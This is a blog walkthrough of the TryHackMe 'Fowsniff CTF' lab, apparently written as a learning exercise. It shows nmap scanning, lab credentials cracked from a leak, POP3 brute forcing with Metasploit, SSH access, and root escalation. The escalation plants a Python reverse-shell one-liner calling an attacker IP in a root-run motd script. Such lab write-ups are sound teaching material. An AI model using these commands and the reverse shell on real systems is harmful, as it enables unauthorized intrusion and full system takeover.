Open in app

Sign in

Write

Sign in

Fowsniff CTF(Tryhackme) Room Walkthrough By Jonty Bhardwaj

Jonty Bhardwaj
5 min readJul 5, 2021

Hello Reader, I am Jonty Bhardwaj currently enrolled in Master Certificate in Cyber Security HackerU program. Today I am here to share a writeup on a Tryhackme machine called Fowsniff CTF.

Now first of all we will navigate to the Room URL and join it.

https://tryhackme.com/room/ctf

After starting the Machine we will first connect through Open VPN and ping the machine through the IP we are given to see if the connection is established. After we are successful in pinging the machine, we will start the fun part which is Pentesting and getting root privilege.

Now first we will start a Nmap scan to see what are the ports and services open on the machine.

nmap -sV -sT -T4 -A 10.10.168.80

Now we can see that 4 ports are open and the most promising port we can gather info looks to be port 80. Lets see what’s on the website there.

From the website we gathered that’s this corporation is hacked recently and the employee credentials are being dumped publicly on their hacked twitter handle — @fowsniffcorp.

Lets check the twitter handle to check the information and maybe get the leaked credentials for ourselves in case some employee was too lazy to change his password .

https://twitter.com/fowsniffcorp?lang=en

From the twitter handle we got that the corporation is hacked by someone named B1gN1nj4.

From the following tweet we also know that the username stone is sysadmin .

It also contained a pastebin dump of employee credentials .

Cracking the MD5 hashed we got these passwords

mauer@fowsniff: mailcall

mustikka@fowsniff: bilbo101

tegel@fowsniff: apples01

baksteen@fowsniff: skyler22

seina@fowsniff: scoobydoo2

stone@fowsniff: Not Found

mursten@fowsniff: carp4ever

parede@fowsniff: orlando12

sciana@fowsniff: 07011972

From this pastebin info we gathered many credentials which maybe changed or not and information on pop3 server that its wide open to be exploited . And looking at our nmap scan it seems the pop3 server is still open .

We then created userfile and passfile to give for bruteforce with the known credentials .

Lets try to exploit the pop3 server ourselves with bruteforcing it with a metasploit module.

msfconsole

use auxiliary/scanner/pop3/pop3_login

show options

set USER_FILE /root/userfile.txt

set PASS_FILE /root/passfile.txt

set RHOSTS 10.10.122.193

run

We got the credentials successfully

Connecting with the credentials in pop3 to see the mails

nc 10.10.168.80 110

USER seina

PASS scoobydoo2

LIST

Here we can see that there are 2 mails , lets read them with the command

RETR 1

As you can see here we have got a SSH Password — S1ck3nBluff+secureshell

We also checked the second mail and got the information that user baksteen sent that mail to seina and he was sick . So he might not have gone to office and his password may be the same temporary password .

Lets try to login with user baksteen and temporary password into ssh.

ssh baksteen@10.10.168.80

And voila we have got access to user baksteen workspace .

After searching we got a file named term.txt

cat term.txt

he file suggest use to find other phrases by person who coined the term “One Hit Wonder”.

We then searched for the files that can be run the user

find / -type f -group users 2>/dev/null

In the start itself we found an interesting shell script file and lets see if we can exploit this file to get a reverse shell .

So now we will try to use this file to run our reverse shell

which python3

We can see that python3 is installed so a python3 reverse shell will work.

nano cube.sh

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.8.107.42”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

We have successfully created a script with python reverse shell in it but we need a someone with higher privilege to run the script or another file with higher privilege to execute the script to escalate our privilege.

We know that when we connect via ssh, cube.sh is executed with a Fowsniff corp banner and cube.sh is executed with another script . maybe we can see the controlling script .

cd /etc/update-motd.d/

As we can see here there is script named 00-header which controls the cube.sh script.

And we can see that these files are created by root. Normal user has execute and read permissions only.

Now if we relogin into the ssh , the new cube.sh will be executed by the 00-header script with root permissions and we will get a reverse shell back with root permissions .

Now relogging into ssh

ssh baksteen@10.10.70.63

As soon we login into baksteen user , we got a reverse shell on our listner with root privilege

nc -lnvp 4444

cat /root/flag.txt

Here we have successfully escalated to root shell after using the exploit command and found the root flag in the root folder.

Proof of Completion

Hacking
Cybersecurity
Tryhackme
Tryhackme Walkthrough
Oscp

--

--

Jonty Bhardwaj

Written by Jonty Bhardwaj

7 Followers

Avid learner and writer trying to gain as much knowledge as possible in the domain of cyber security while sharing my learning to help other people like myself.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams